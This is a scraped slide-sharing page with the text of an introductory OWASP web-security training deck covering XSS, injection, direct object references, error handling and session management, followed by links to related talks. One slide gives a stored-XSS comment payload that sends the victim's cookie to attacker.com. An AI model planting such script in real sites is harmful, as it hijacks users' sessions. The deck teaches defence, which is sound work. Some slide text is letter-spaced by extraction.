owasp most critical web application security
play

OWASP Most Critical Web Application Security Vulnerabilities - PowerPoint PPT Presentation

Aug 28, 2022 •427 likes •830 views

OWASP Most Critical Web Application Security Vulnerabilities Introduction 2 Purpose of Session: - Provide Overview Web Application Security Threats and Defense Using the Open Web Application Security Project (OWASP) Top List, we

  1. OWASP Most Critical Web Application Security Vulnerabilities

  2. Introduction 2  Purpose of Session: - Provide Overview Web Application Security Threats and Defense  Using the Open Web Application Security Project (OWASP) “Top List,” we will: - Define the vulnerabilities - Illustrate the Web Application vulnerabilities - Explain how to protect against the vulnerabilities

  3. Definition of Web Application Vulnerabilities 3  Web Application Vulnerability: Weakness in custom Web Application, architecture, design, configuration, or code.

  4. How Bad Is It ? 4 (Server-side Include)  Bad ** Web Application Security Consortium (WASC) http://www.webappsec.org/projects/statistics/

  5. OWASP Top List 5 Cross-Site Scripting (XSS) Injections Flaws Insecure Direct Object Reference Information Leakage & Improper Error Handling Broken Authentication & Session Management Insecure Cryptographic Storage Insecure Communications Failure to Restrict URL Access

  6. 6 Cross-Site Scripting (XSS) Flaws OWASP Definition XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

  7. Cross-Site Scripting (XSS) Attacks 7  Stored - the injected code is permanently stored (in a database, message forum, visitor log, etc.) Example Comment embedded with JavaScript comment=“Nice site! <SCRIPT> window.open( http://attacker.com/info.php?document.cookie </SCRIPT>”

  8. Cross-Site Scripting (XSS) 8  Occurs when an attacker can manipulate a Web application to send malicious scripts to a third party. This is usually done when there is a location that arbitrary content can  be entered into (such as an e-mail message, or free text field for example) and then referenced by the target of the attack.  The attack typically takes the form of an HTML tag (frequently a hyperlink) that contains malicious scripting (often JavaScript). The target of the attack trusts the Web application and thus XSS  attacks exploit that trust to do things that would not normally be allowed.

  9. XSS - Pro te c tio n 9 Protect your application from XSS attacks  Filter output by converting text/data which might have dangerous HTML characters to its encoded format:  '<' and '>' to '&lt;' and '&gt;’  '(' and ')' to '&#40;' and '&#41;’  '#' and '&' to '&#35;' and '&#38;‘  Recommend filtering on input as much as possible. (some data may need to allow special characters.)

  10. 10 Injections Flaws OWASP Definition: Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing unintended commands or changing data.

  11. Injections Flaws 11 Some common types of command injection flaws include:  SQL injection (malicious calls to backend databases via SQL), using shell commands to run external programs  Using system calls to in turn make calls to the operating system. Any Web application that relies on the use of an interpreter has the potential to fall victim to this type of flaw

  12. Injections Flaws: Protection 12  Check for existing reusable libraries to validate input, and safely perform system functions, or develop your own.  Other common methods of protection include:  Use stored Procedures  Data validation (to ensure input isn't malicious code),  Run commands with very minimal privileges  If the application is compromised, the damage will be minimized.

  13. 13 Insecure Direct Object Reference OWASP Definition: A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.

  14. Insecure Direct Object Reference 14  Applic a tio ns o fte n e xpo se inte rna l o b je c ts, ma king the m a c c e ssib le via pa ra me te rs.  Whe n tho se o b je c ts a re e xpo se d, the a tta c ke r ma y ma nipula te una utho rize d o b je c ts, if pro pe r a c c e ss c o ntro ls a re no t in pla c e .  I nte rna l Ob je c ts mig ht inc lude  F ile s o r Dire c to rie s  URL s  Da ta b a se ke y, suc h a s acct_no, group_id e tc .  Othe r da ta b a se o b je c t na me s suc h a s ta b le na me

  15. Insecure Direct Object Reference Protection 15  Do no t e xpo se dire c t o b je c ts via pa ra me te rs  Use a n indire c t ma pping whic h is simple to va lida te .  Co nside r using a ma ppe d nume ric ra ng e , file =1 o r 2 …  Re -ve rify a utho riza tio n a t e ve ry re fe re nc e .  F o r e xa mple : Applic a tio n pro vide d a n initia l lists o f o nly the 1. a utho rize d o ptio ns. Whe n use r’ s o ptio n is “sub mitte d” a s a pa ra me te r, 2. a utho riza tio n must b e c he c ke d a g a in.

  16. 16 Information Leakage & Improper Error Handling OWASP Definition: Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data or conduct more serious attacks.

  17. Improper Error Handling: Protection 17  Prevent display of detailed internal error messages including stack traces, messages with database or table names, protocols, and other error codes. (This can provide attackers clues as to potential flaws.)  Good error handling systems should always enforce the security scheme in place while still being able to handle any feasible input.  Provide short error messages to the user while logging detailed error information to an internal log file.  Diagnostic information is available to site maintainers  Vague messages indicating an internal failure provided to the users  Provide just enough information to allow what is reported by the user to be able to linked the internal error logs. For example: System Time-stamp, client IP address, and URL

  18. Broken Authentication and Session Management 18 OWASP Definition: Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users’ identities.

  19. Session Management 19  HTTP/S protocol does not provide tracking of a users session.  Session tracking answers the question:  After a user authenticates how does the server associate subsequent requests to the authenticated user?  Typically, web application vendors provide a built-in session tracking, which is good if used properly.

  20. Session Management (Session IDs) 20 A Session ID  Unique to the User  Used for only one authenticated session  Generated by the server  Sent to the client as  Hidden variable,  HTTP cookie,  URL query string (not a good practice)  The user is expected to send back the same ID in the next request.

  21. Session Management (Session Hijacking) 21  Session ID is disclosed or is guessed.  An attacker using the same session ID has the same privileges as the real user.  Especially useful to an attacker if the session is privileged.  Allows initial access to the web application to be combined with other attacks.

  22. Session Management: Protection 22  Use long complex random session ID that cannot be guessed.  Protect the transmission and storage of the Session ID to prevent disclosure and hijacking.  A URL query string should not be used for Session ID or any User/Session information  URL is stored in browser cache  Logged via Web proxies and stored in the proxy cache

  23. Session Management: Protection 23  Entire session should be transmitted via HTTPS to prevent disclosure of the session ID. (not just the authentication)  Avoid or protect any session information transmitted to/from the client.  Session ID should expire and/or time-out on the Server when idle or on logout.  Consider regenerating a new session upon successful authentication or privilege level change.

  24. Broken Account Management Even valid authentication schemes can be undermined by flawed account management functions including:  Account update  Forgotten password recovery or reset  Change password, and other similar functions 24

  25. 25 Broken Account and Session Management: Protection  Password Change Controls - require users to provide both old and new passwords  Forgotten Password Controls - if forgotten passwords are emailed to users, they should be required to re-authenticate whenever they attempt to change their email address.  Password Strength - require at least 7 characters, with letters, numbers, and special characters both upper case and lower case.  Password Expiration - Users must change passwords every 90 days, and administrators every 30 days.

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva

Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva

Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva 12/12/2016 Jrmy MATOS whois securingapps Developer background Spent last 10 years working between Geneva and Lausanne on security products

867 views • 22 slides
OWASP Top 10 OWASP Top Ten meets JSF Andreas Hartmann Application Security Komponente

OWASP Top 10 OWASP Top Ten meets JSF Andreas Hartmann Application Security Komponente

Agenda Application Security OWASP Top 10 OWASP Top Ten meets JSF Andreas Hartmann Application Security Komponente Application Security Startup 04.04.2013 04.04.2013 2 OWASP Top 10 Agenda Application Security Was ist Application Security

234 views • 8 slides
Web Application Security Attacks on the Web Attacker Web User Application Web Database Web

Web Application Security Attacks on the Web Attacker Web User Application Web Database Web

IN3210 Network Security Web Application Security Attacks on the Web Attacker Web User Application Web Database Web Server Application 2 The OWASP Foundation The Open Web Application Security Project (OWASP) is a 501(c)(3)

1.21k views • 60 slides
New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200

New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200

New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200 OWASP Flagship Projects Tool Projects OWASP Amass OWASP CSRFGuard OWASP Defectdojo OWASP Dependency-Check OWASP Dependency-Track

751 views • 55 slides
Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web

Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web

Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web Security Risks https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010-2017%20(en).pdf Today

998 views • 78 slides
Pushing Left, Like a Boss Application Security Foundations Tanya Janca Tanya.Janca@owasp.org

Pushing Left, Like a Boss Application Security Foundations Tanya Janca Tanya.Janca@owasp.org

Pushing Left, Like a Boss Application Security Foundations Tanya Janca Tanya.Janca@owasp.org OWASP Ottawa Chapter Leader OWASP DevSlop Project Leader @sheHacksPurple About Me Who am I? Im Tanya Janca; Application security evangelist, web

434 views • 30 slides
with ASP.NET / MVC &amp; OWASP Adnan Masood Sr. System Architect Green Dot Corporation What

with ASP.NET / MVC &amp; OWASP Adnan Masood Sr. System Architect Green Dot Corporation What

Web Application Security with ASP.NET / MVC &amp; OWASP Adnan Masood Sr. System Architect Green Dot Corporation What this talk is about? 2 This session is an introduction to web application security threats using the OWASP Top 10 list

977 views • 69 slides
UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is

UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is

UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is OWASP? Open Web Application Security Project Non-profit organization focused on improving security of software. They have some GREAT info on

372 views • 9 slides
Security and OWASP Top 10 with Service Oriented Architectures Adnan Masood Sr. System Architect

Security and OWASP Top 10 with Service Oriented Architectures Adnan Masood Sr. System Architect

Practical Web Application Security and OWASP Top 10 with Service Oriented Architectures Adnan Masood Sr. System Architect Green Dot Corporation What this talk is about? 2 This session is an introduction to web application security

839 views • 60 slides
Web App Log Analytics www.roykim.ca roy@roykim.ca Op Open Web Applica cation tion Secu

Web App Log Analytics www.roykim.ca roy@roykim.ca Op Open Web Applica cation tion Secu

August 21, 2019 Web App Log Analytics www.roykim.ca roy@roykim.ca Op Open Web Applica cation tion Secu curity rity Project ject OWASP ModSecurity Core Rule Set (CRS) OWASP Top 10 Most Critical Web Application Security Risks

490 views • 21 slides
Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten

Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten

Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web Security Risks https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010-2017%20(en).pdf Today

916 views • 87 slides
Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German

Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German

Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German Day 20.11.2018 Carlos Holguera $ whoami Carlos Holguera [olera] Security Engineer working at ESCRYPT GmbH since 2012 Area of expertise:

790 views • 56 slides
Driving OWASP ZAP with Selenium About Me Mark Torrens - Recently moved into Cyber Security -

Driving OWASP ZAP with Selenium About Me Mark Torrens - Recently moved into Cyber Security -

Driving OWASP ZAP with Selenium About Me Mark Torrens - Recently moved into Cyber Security - Based in London - Completjng MSc Cyber Security @ University of York - Security Architect for Kainos Mateusz Kalinowski - Java research OWASP

789 views • 23 slides
OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our

OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our

OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our community to remain vendor neutral with the collective wisdom of the best minds in software security worldwide. OWASP Foundation, NYC Chapter

382 views • 23 slides
OWASP Summit 2017 Why, how, what, where (v0.9, Jan 2017) Close your eyes Imagine a place

OWASP Summit 2017 Why, how, what, where (v0.9, Jan 2017) Close your eyes Imagine a place

OWASP Summit 2017 Why, how, what, where (v0.9, Jan 2017) Close your eyes Imagine a place where (some of ) the best Application Security and OWASP minds come together to collaborate and work a meeting of minds focused on solving

770 views • 37 slides
Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017

Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017

Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017 Changes between 2013 and 2017 Hi, I am X. How do I get into AppSec/Security? OWASP Toronto Chapter January 17, 2018 Topics Overviews, Career Paths,

372 views • 36 slides
Network Measurements Censorship and Digital Rights in Southeast Asia Khairil Yusof, Sinar Project

Network Measurements Censorship and Digital Rights in Southeast Asia Khairil Yusof, Sinar Project

Network Measurements Censorship and Digital Rights in Southeast Asia Khairil Yusof, Sinar Project This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. History 13th General Elections HTTP was

612 views • 34 slides
Cracking the Perimeter with SharpShooter Dominic Chell June 2019 # whoami Dominic Chell:

Cracking the Perimeter with SharpShooter Dominic Chell June 2019 # whoami Dominic Chell:

Cracking the Perimeter with SharpShooter Dominic Chell June 2019 # whoami Dominic Chell: Offensive Security @ MDSec Responsible for *BEST, STAR and TIBER services Twitter : @domchell Projects: SharpShooter LyncSniper

802 views • 46 slides
Session Juggler Elie Bursztein, Chinmay Soman, Dan Boneh, John Michell Stanford University /

Session Juggler Elie Bursztein, Chinmay Soman, Dan Boneh, John Michell Stanford University /

Session Juggler Elie Bursztein, Chinmay Soman, Dan Boneh, John Michell Stanford University / Google 1 About this presentation Date: 19 April 2012 Conference: WWW 2012 Feel free to contact me URL: http://ly.tl/p23 if you have any question

916 views • 27 slides
uProxy: a Social Proxy for your Browser Raymond Cheng, Will Scott, Aaron Gallant, Tom Anderson,

uProxy: a Social Proxy for your Browser Raymond Cheng, Will Scott, Aaron Gallant, Tom Anderson,

uProxy: a Social Proxy for your Browser Raymond Cheng, Will Scott, Aaron Gallant, Tom Anderson, Arvind Krishnamurthy University of Washington Seattle, WA, USA with help from our friends at Google Ideas 1/19 Takeaways Users need more

563 views • 24 slides
Security for access to device APIs Stewart Brodie ANT Galio Browser Software Team Leader ANT

Security for access to device APIs Stewart Brodie ANT Galio Browser Software Team Leader ANT

Security for access to device APIs Stewart Brodie ANT Galio Browser Software Team Leader ANT Software Ltd. WAFERs: Overview An application model for HTML + JavaScript content Requires no changes to an existing HTML document Only

233 views • 7 slides
CYBER SECURITY FOR AVIATION OPERATIONS DR ELENA SITNIKOVA, PHD, BE (HONS), CSSLP, SFHEA CRITICAL

CYBER SECURITY FOR AVIATION OPERATIONS DR ELENA SITNIKOVA, PHD, BE (HONS), CSSLP, SFHEA CRITICAL

CYBER SECURITY FOR AVIATION OPERATIONS DR ELENA SITNIKOVA, PHD, BE (HONS), CSSLP, SFHEA CRITICAL INFRASTRUCTURE PROTECTION, RESEARCH LEADER THE SPITFIRE MEMORIAL DEFENCE FELLOW UNSW CANBERRA @ ADFA E.SITNIKOVA@ADFA.EDU.AU BACKGROUND

731 views • 22 slides
Fingerprinting Information in JavaScript Implementations Keaton Mowery, Dillon Bogenreif, Scott

Fingerprinting Information in JavaScript Implementations Keaton Mowery, Dillon Bogenreif, Scott

Fingerprinting Information in JavaScript Implementations Keaton Mowery, Dillon Bogenreif, Scott Yilek, and Hovav Shacham Thursday, May 26, 2011 Authentication Usernames and Passwords weakening Third-party data loss can compromise

684 views • 26 slides
The security of Mozilla Firefoxs Extensions Kristjan Krips Topics Introduction The

The security of Mozilla Firefoxs Extensions Kristjan Krips Topics Introduction The

The security of Mozilla Firefoxs Extensions Kristjan Krips Topics Introduction The extension model How could extensions be used for attacks - website defacement - phishing attacks - cross site scripting The attacks could result

517 views • 20 slides

More recommend